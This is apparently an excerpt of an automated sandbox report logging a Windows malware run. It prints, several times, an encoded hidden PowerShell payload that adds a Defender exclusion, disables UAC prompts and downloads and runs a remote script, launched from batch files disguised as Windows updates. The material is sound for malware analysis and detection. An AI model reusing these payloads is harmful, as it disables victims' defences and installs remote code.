WMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
